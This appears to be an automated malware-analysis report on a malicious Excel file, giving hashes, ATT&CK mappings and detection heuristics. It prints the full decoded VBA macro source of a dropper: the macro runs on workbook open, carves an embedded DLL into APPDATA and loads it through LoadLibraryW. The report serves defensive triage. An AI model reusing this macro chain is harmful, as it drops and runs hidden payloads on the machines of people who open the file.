Office (OLE) malware analysis — malicious · 537d3da83324795e

MALICIOUS

Office (OLE)

278.0 KB Created: 2019-08-30 09:14:50 Authoring application: Microsoft Excel First seen: 2019-11-20

MD5: 069dfc595ea9930d600c2da5e85e3a02 SHA-1: 8136933342995a9eb7a8a783214703dfe200ca79 SHA-256: 537d3da83324795ebf52e8a471f6156ee63c285940405e3f901558984fccb90e

356 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1137.001 Software Deployment: Application Shimming T1566.001 Spearphishing Attachment T1027 Obfuscated Files or Information T1105 Ingress Tool Transfer

The sample is a malicious Excel file containing VBA macros that are triggered by the Workbook_Open event. These macros are designed to execute a second-stage payload, specifically an embedded PE executable named 'embedded_office_00003219.exe', and potentially load DLLs from the AppData directory. The use of `ExecuteExcel4Macro` and `CreateObject` indicates a sophisticated macro execution chain, likely for downloading and running further malicious components.

Heuristics 10

ClamAV: Xls.Malware.Sdrop-7173293-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Sdrop-7173293-0
Embedded PE executable critical OLE_EMBEDDED_EXE

MZ/PE header found inside document — possible embedded executable
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA ActiveX event launches decoded Excel4 macro critical OLE_VBA_ACTIVEX_XLM_STAGER

The compiled VBA p-code (identifier table) references an auto-firing ActiveX/control event together with ExecuteExcel4Macro, while the decompressed source does not — the VBA-stomping shape of the ActiveX-event XLM stager. The control event bridges into XLM formula execution to call Win32 / drop payloads, hidden from source-level scanners.

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

        Set oApp = CreateObject("Shell.Application")
        oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin")

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
ChDir (Environ("TEMP"))
    UserForm1.Show
```
Reference to LoadLibrary API high SC_STR_LOADLIBRARY

Reference to LoadLibrary API
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4558 bytes
SHA-256: `f2fbd06d6080393ee75adcf236d930931be8c5708308466883882493707ab1e5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "wbO" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() ExecuteExcel4Macro "MESSAGE(False, ""Debug"")" ChDir (Environ("TEMP")) UserForm1.Show ExecuteExcel4Macro "MESSAGE(False, ""Debug"")" End Sub Attribute VB_Name = "Page1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Module1" #If Win64 Then Public Declare PtrSafe Function Whisk Lib _ "masterbox2.dll" () As Integer Public Declare PtrSafe Function Whisk2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long #Else Public Declare Function Whisk2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long Public Declare Function Whisk Lib _ "masterbox1.dll" () As Integer #End If Public Sub CreateGifFile() TempName = Environ("TEMP") & "\factory.xlsx" ZipName = TempName + ".zip" ZipFolder = Environ("TEMP") '& "\UnzTmp" Dim nm As String Dim size As Long Dim num As Integer #If Win64 Then nm = Environ("APPDATA") + "\masterbox2.dll" size = 66048 num = 2 #Else nm = Environ("APPDATA") + "\masterbox1.dll" size = 77824 num = 1 #End If On Error Resume Next Kill ZipName Kill ZipFolder & "\oleObject*.bin" Kill nm On Error GoTo 0 ThisWorkbook.Sheets.Copy Application.DisplayAlerts = False ActiveWorkbook.SaveAs TempName, FileFormat:=51 ActiveWorkbook.Close FileCopy TempName, ZipName Set oApp = CreateObject("Shell.Application") oApp.Namespace(ZipFolder).CopyHere oApp.Namespace(ZipName).items.Item("xl\embeddings\oleObject1.bin") Resoration ZipFolder + "\oleObject1.bin", nm, size, num ChDir (Environ("APPDATA")) No_Whisk = Whisk2(nm) Whisk End Sub Attribute VB_Name = "UserForm1" Attribute VB_Base = "0{54658FBA-83F3-476F-A741-48619E46126D}{F34A0AA4-6EB1-444F-9E5F-E476F3FEE925}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub Label1_Click() End Sub Private Sub UserForm_Activate() CreateGifFile End Sub Private Sub UserForm_Error(ByVal Number As Integer, ByVal Description As MSForms.ReturnString, ByVal SCode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, ByVal CancelDisplay As MSForms.ReturnBoolean) End Sub Attribute VB_Name = "Module2" Public Sub Resoration(s As String, nm As String, fl As Long, num As Integer) Dim intFileNum As Long, bytTemp1 As Byte, bytTemp2 As Byte, bytTemp3 As Byte Dim DataArray() As Long ReDim DataArray(1 To fl) DataArray(1) = CByte(50 + 27) DataArray(2) = CByte(50 + 40) DataArray(3) = CByte(50 + 94) intFileNum = FreeFile Open s For Binary Access Read As intFileNum Dim cur As Integer cur = 1 Do While Not EOF(intFileNum) Get intFileNum, , bytTemp1 If bytTemp1 = DataArray(1) Then Get intFileNum, , bytTemp2 If bytTemp2 = DataArray(2) Then Get intFileNum, , bytTemp3 If bytTemp3 = DataArray(3) Then If cur = num Then For k = 4 To fl Get intFileNum, , bytTemp1 DataArray(k) = bytTemp1 Next k Exit Do Else cur = cur + 1 End If End If End If End If Loop Close intFileNum intFileNum = FreeFile Open nm For Binary Lock Read Write As #intFileNum For i = LBound(DataArray) To UBound(DataArray) Put #intFileNum, , CByte(DataArray(i)) Next i Close #intFileNum End Sub
`embedded_office_00003219.exe`	embedded-pe	Office MZ+PE at offset 0x3219	271847 bytes
SHA-256: `36a8b5511ea43dc1240f356a0211bf2116176e304e4387eebe4afbd9a4e2d02d`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved macro source contains an auto-exec entry point and execution/download terms.
`ole10native_00.bin`	ole-package	OLE Ole10Native stream: MBD005CEEB8/Ole10Native	152905 bytes
SHA-256: `b82e33e5348d80a77c4fe40bb534a80d1bce00367754818359343bb7622076e6`

Open this report in the interactive analyzer, or submit your own file for analysis.